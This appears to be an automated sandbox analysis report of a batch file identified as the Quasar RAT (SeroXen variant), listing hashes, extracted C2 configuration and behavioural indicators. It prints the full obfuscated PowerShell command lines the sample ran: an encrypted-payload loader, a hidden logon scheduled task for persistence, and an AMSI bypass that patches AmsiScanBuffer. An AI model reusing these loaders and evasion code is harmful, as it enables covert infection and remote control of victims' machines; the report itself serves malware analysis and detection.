quasar | 070f7c800e8278b2cad111635cec3c501ff0aa9aa93fdd9529fcb8736a06d56d

Analysis

max time kernel
254s
max time network
255s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
29-05-2024 21:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OutspectLEAKUNBAN.bat
Size

1003KB
MD5

d6d62f532591a7d034abac21eff0b57b
SHA1

94c28efce74a67eb18d28bd51f65d285c8d1caef
SHA256

070f7c800e8278b2cad111635cec3c501ff0aa9aa93fdd9529fcb8736a06d56d
SHA512

26f94770e0d250aa6e063af8d5422848a72753a72b20e62b33a76fef5453cdd9e1f70466a935ef0dec145af9b293e12a6ec0e9101f0bd8e80edd3f4be706294a
SSDEEP

24576:iGtp7xs0OFrW/eIeexsYboNCkhhdmjynCf7O:jXO5WnsYcTdPnwO

Score

10^/10

quasar seroxen | v3.1.5 |execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen | v3.1.5 |

runderscore00-25501.portmap.host:25501

Mutex

$Sxr-jy6vh8CtEJL5ceZuIb

Attributes

encryption_key
JCa22tR8WnO00adn2TuE
install_name
$sxr-powershell.exe
log_directory
$sxr-Logs
reconnect_delay
3000
startup_key
Powershell
subdirectory
$sxr-seroxen2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1984-34-0x0000000008FA0000-0x0000000009092000-memory.dmp	family_quasar
behavioral1/memory/2592-205-0x000000000A660000-0x000000000A6CC000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2524 created 556 2524 powershell.EXE winlogon.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

2 2592 powershell.exe
6 2592 powershell.exe
8 2592 powershell.exe
25 2592 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1984 powershell.exe
788 powershell.exe
2592 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Install.exe

pid process

4716 Install.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 2524 created 556	2524	powershell.EXE	winlogon.exe

flow	pid	process
2	2592	powershell.exe
6	2592	powershell.exe
8	2592	powershell.exe
25	2592	powershell.exe

pid	process
4716	Install.exe

flow	ioc
1	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

powershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2524 set thread context of 792 2524 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2524 set thread context of 792	2524	powershell.EXE	dllhost.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings powershell.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

404 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	powershell.exe

pid	process
404	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid	process
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe
788	powershell.exe
788	powershell.exe
788	powershell.exe
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe
5016	powershell.exe
2524	powershell.EXE
5016	powershell.exe
2524	powershell.EXE
5016	powershell.exe
2524	powershell.EXE
2524	powershell.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeIncreaseQuotaPrivilege	788	powershell.exe
Token: SeSecurityPrivilege	788	powershell.exe
Token: SeTakeOwnershipPrivilege	788	powershell.exe
Token: SeLoadDriverPrivilege	788	powershell.exe
Token: SeSystemProfilePrivilege	788	powershell.exe
Token: SeSystemtimePrivilege	788	powershell.exe
Token: SeProfSingleProcessPrivilege	788	powershell.exe
Token: SeIncBasePriorityPrivilege	788	powershell.exe
Token: SeCreatePagefilePrivilege	788	powershell.exe
Token: SeBackupPrivilege	788	powershell.exe
Token: SeRestorePrivilege	788	powershell.exe
Token: SeShutdownPrivilege	788	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeSystemEnvironmentPrivilege	788	powershell.exe
Token: SeRemoteShutdownPrivilege	788	powershell.exe
Token: SeUndockPrivilege	788	powershell.exe
Token: SeManageVolumePrivilege	788	powershell.exe
Token: 33	788	powershell.exe
Token: 34	788	powershell.exe
Token: 35	788	powershell.exe
Token: 36	788	powershell.exe
Token: SeIncreaseQuotaPrivilege	788	powershell.exe
Token: SeSecurityPrivilege	788	powershell.exe
Token: SeTakeOwnershipPrivilege	788	powershell.exe
Token: SeLoadDriverPrivilege	788	powershell.exe
Token: SeSystemProfilePrivilege	788	powershell.exe
Token: SeSystemtimePrivilege	788	powershell.exe
Token: SeProfSingleProcessPrivilege	788	powershell.exe
Token: SeIncBasePriorityPrivilege	788	powershell.exe
Token: SeCreatePagefilePrivilege	788	powershell.exe
Token: SeBackupPrivilege	788	powershell.exe
Token: SeRestorePrivilege	788	powershell.exe
Token: SeShutdownPrivilege	788	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeSystemEnvironmentPrivilege	788	powershell.exe
Token: SeRemoteShutdownPrivilege	788	powershell.exe
Token: SeUndockPrivilege	788	powershell.exe
Token: SeManageVolumePrivilege	788	powershell.exe
Token: 33	788	powershell.exe
Token: 34	788	powershell.exe
Token: 35	788	powershell.exe
Token: 36	788	powershell.exe
Token: SeIncreaseQuotaPrivilege	788	powershell.exe
Token: SeSecurityPrivilege	788	powershell.exe
Token: SeTakeOwnershipPrivilege	788	powershell.exe
Token: SeLoadDriverPrivilege	788	powershell.exe
Token: SeSystemProfilePrivilege	788	powershell.exe
Token: SeSystemtimePrivilege	788	powershell.exe
Token: SeProfSingleProcessPrivilege	788	powershell.exe
Token: SeIncBasePriorityPrivilege	788	powershell.exe
Token: SeCreatePagefilePrivilege	788	powershell.exe
Token: SeBackupPrivilege	788	powershell.exe
Token: SeRestorePrivilege	788	powershell.exe
Token: SeShutdownPrivilege	788	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeSystemEnvironmentPrivilege	788	powershell.exe
Token: SeRemoteShutdownPrivilege	788	powershell.exe
Token: SeUndockPrivilege	788	powershell.exe
Token: SeManageVolumePrivilege	788	powershell.exe
Token: 33	788	powershell.exe
Token: 34	788	powershell.exe
Token: 35	788	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

2592 powershell.exe

pid	process
2592	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEcmd.exe

description	pid	process	target process
PID 508 wrote to memory of 1984	508	cmd.exe	powershell.exe
PID 508 wrote to memory of 1984	508	cmd.exe	powershell.exe
PID 508 wrote to memory of 1984	508	cmd.exe	powershell.exe
PID 1984 wrote to memory of 788	1984	powershell.exe	powershell.exe
PID 1984 wrote to memory of 788	1984	powershell.exe	powershell.exe
PID 1984 wrote to memory of 788	1984	powershell.exe	powershell.exe
PID 1984 wrote to memory of 3876	1984	powershell.exe	WScript.exe
PID 1984 wrote to memory of 3876	1984	powershell.exe	WScript.exe
PID 1984 wrote to memory of 3876	1984	powershell.exe	WScript.exe
PID 3876 wrote to memory of 664	3876	WScript.exe	cmd.exe
PID 3876 wrote to memory of 664	3876	WScript.exe	cmd.exe
PID 3876 wrote to memory of 664	3876	WScript.exe	cmd.exe
PID 664 wrote to memory of 2592	664	cmd.exe	powershell.exe
PID 664 wrote to memory of 2592	664	cmd.exe	powershell.exe
PID 664 wrote to memory of 2592	664	cmd.exe	powershell.exe
PID 2592 wrote to memory of 5016	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 5016	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 5016	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 4716	2592	powershell.exe	Install.exe
PID 2592 wrote to memory of 4716	2592	powershell.exe	Install.exe
PID 2592 wrote to memory of 4716	2592	powershell.exe	Install.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2524 wrote to memory of 792	2524	powershell.EXE	dllhost.exe
PID 2592 wrote to memory of 4128	2592	powershell.exe	cmd.exe
PID 2592 wrote to memory of 4128	2592	powershell.exe	cmd.exe
PID 2592 wrote to memory of 4128	2592	powershell.exe	cmd.exe
PID 4128 wrote to memory of 1564	4128	cmd.exe	chcp.com
PID 4128 wrote to memory of 1564	4128	cmd.exe	chcp.com
PID 4128 wrote to memory of 1564	4128	cmd.exe	chcp.com
PID 4128 wrote to memory of 404	4128	cmd.exe	PING.EXE
PID 4128 wrote to memory of 404	4128	cmd.exe	PING.EXE
PID 4128 wrote to memory of 404	4128	cmd.exe	PING.EXE

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:556

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{11438483-f4b4-4d63-9018-7656c1fe3592}
2⤵
PID:792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OutspectLEAKUNBAN.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j42DKp8x0h4213c6GrktRdOMxpGkpJXPO6k3HjxwrZM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7/5Nvry12FqfboNbAUGrww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZIqOg=New-Object System.IO.MemoryStream(,$param_var); $mvnnt=New-Object System.IO.MemoryStream; $LUPro=New-Object System.IO.Compression.GZipStream($ZIqOg, [IO.Compression.CompressionMode]::Decompress); $LUPro.CopyTo($mvnnt); $LUPro.Dispose(); $ZIqOg.Dispose(); $mvnnt.Dispose(); $mvnnt.ToArray();}function execute_function($param_var,$param2_var){ $XYSou=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $haZBF=$XYSou.EntryPoint; $haZBF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\OutspectLEAKUNBAN.bat';$XBrYH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\OutspectLEAKUNBAN.bat').Split([Environment]::NewLine);foreach ($TMJVW in $XBrYH) { if ($TMJVW.StartsWith(':: ')) { $RNBnP=$TMJVW.Substring(3); break; }}$payloads_var=[string[]]$RNBnP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_483_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_483.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_483.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:3876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_483.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j42DKp8x0h4213c6GrktRdOMxpGkpJXPO6k3HjxwrZM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7/5Nvry12FqfboNbAUGrww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZIqOg=New-Object System.IO.MemoryStream(,$param_var); $mvnnt=New-Object System.IO.MemoryStream; $LUPro=New-Object System.IO.Compression.GZipStream($ZIqOg, [IO.Compression.CompressionMode]::Decompress); $LUPro.CopyTo($mvnnt); $LUPro.Dispose(); $ZIqOg.Dispose(); $mvnnt.Dispose(); $mvnnt.ToArray();}function execute_function($param_var,$param2_var){ $XYSou=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $haZBF=$XYSou.EntryPoint; $haZBF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_483.bat';$XBrYH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_483.bat').Split([Environment]::NewLine);foreach ($TMJVW in $XBrYH) { if ($TMJVW.StartsWith(':: ')) { $RNBnP=$TMJVW.Substring(3); break; }}$payloads_var=[string[]]$RNBnP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5016

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
6⤵
- Executes dropped EXE
PID:4716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7rivpDcXWOa4.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\SysWOW64\chcp.com
chcp 65001
7⤵
PID:1564

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ONZevmsycGkb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YNwdSGtLeWVubh,[Parameter(Position=1)][Type]$rmoSNpEnTu)$NwUKZahmhVE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'l'+'e'+''+'c'+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+'e'+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+'r'+'y'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+'l'+'a'+''+[Char](115)+''+'s'+','+'P'+''+[Char](117)+'b'+'l'+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+'C'+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NwUKZahmhVE.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+'ial'+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+'u'+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$YNwdSGtLeWVubh).SetImplementationFlags(''+'R'+''+[Char](117)+'nti'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+'e'+''+[Char](100)+'');$NwUKZahmhVE.DefineMethod(''+[Char](73)+'nv'+[Char](111)+'ke',''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+'Sl'+[Char](111)+''+'t'+''+[Char](44)+'V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$rmoSNpEnTu,$YNwdSGtLeWVubh).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $NwUKZahmhVE.CreateType();}$YxdMzqJvAWlak=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Met'+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$MlvkROANVuIrrw=$YxdMzqJvAWlak.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+''+'c'+''+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+'ub'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gJhsHOJVNwhKHmgvtOs=ONZevmsycGkb @([String])([IntPtr]);$ULPdSYuYNRSSpqFdBXGCQw=ONZevmsycGkb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WsyqJSilBwy=$YxdMzqJvAWlak.GetMethod('G'+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'eH'+'a'+''+[Char](110)+'d'+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$ooWegkDvIIogGV=$MlvkROANVuIrrw.Invoke($Null,@([Object]$WsyqJSilBwy,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+'y'+[Char](65)+'')));$RxPOiqnunUzOvilRa=$MlvkROANVuIrrw.Invoke($Null,@([Object]$WsyqJSilBwy,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+'r'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$AcZpsTt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ooWegkDvIIogGV,$gJhsHOJVNwhKHmgvtOs).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$IfFCXtJBpKGUbsjaW=$MlvkROANVuIrrw.Invoke($Null,@([Object]$AcZpsTt,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$HNRToiMcEL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RxPOiqnunUzOvilRa,$ULPdSYuYNRSSpqFdBXGCQw).Invoke($IfFCXtJBpKGUbsjaW,[uint32]8,4,[ref]$HNRToiMcEL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IfFCXtJBpKGUbsjaW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RxPOiqnunUzOvilRa,$ULPdSYuYNRSSpqFdBXGCQw).Invoke($IfFCXtJBpKGUbsjaW,[uint32]8,0x20,[ref]$HNRToiMcEL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+'T'+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+'7'+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
